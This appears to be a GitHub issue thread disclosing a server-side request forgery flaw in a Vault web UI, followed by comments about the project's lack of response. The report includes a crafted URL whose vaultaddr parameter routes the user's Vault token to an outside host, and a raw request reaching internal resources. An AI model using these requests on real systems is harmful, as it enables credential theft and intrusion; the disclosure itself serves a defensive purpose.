
Security issue. Token leakage

Open anton00706 opened this issue 6 years ago • 5 comments

Hi. Our security team tested your UI and found a vulnerability. Here is the feedback from them:

Steps to reproduce token leakage:

  1. Login to vault ui with token
  2. visit http://spb-off-vault01.team.wrike.com:8000/v1/sys/capabilities-self?vaultaddr=http:%2F%2Fifyoucanyoucantest.pythonanywhere.com%2fexamples%2fsimple_examples%2fhello3.html%3f
  3. Open file token.txt at 192.168.3.105

Access token stolen.

Internal resources access:

  1. Disable VPN and send the request GET /v1/sys/capabilities-self?vaultaddr=https:%2F%2Fgit.wrke.in HTTP/1.1 Host: spb-off-vault01.team.wrike.com:8000 ...

You get the git.wrke.in content, but we assume that the attacker cannot have access to it.

Actual result: Token stolen, internal resources accessed

Expected result: No SSRF

Area of Responsibility: Other

Recommendation: Do not use user input; take the value of the target host from configuration.

Currently in /src/vaultapi.js: let vaultAddr = req.query.vaultaddr;

but should be something like this: let vaultAddr = config['vaultaddr']

anton00706 avatar Aug 15 '18 15:08 anton00706

Soooo. Any suggestions for another UI that's not this one, @anton00706?

ghost avatar Jan 07 '19 13:01 ghost

@reverendtimm the official one? See https://www.hashicorp.com/resources/vault-oss-ui-introduction

JorisInsign avatar Jan 07 '19 14:01 JorisInsign

@JorisInsign noice. Thanks.

ghost avatar Jan 07 '19 14:01 ghost

  • What is the status of this issue?
  • Repro steps are not very clear.

rptxcosmo avatar Jan 30 '19 15:01 rptxcosmo

There has been no response from a developer, nor has there been a commit since this issue was opened.

So at this point, I don't even care if the issue is real. (Though I think it is). Clearly using Vault-UI to access (company) secrets is a no-go.

Bitblade avatar Feb 05 '19 18:02 Bitblade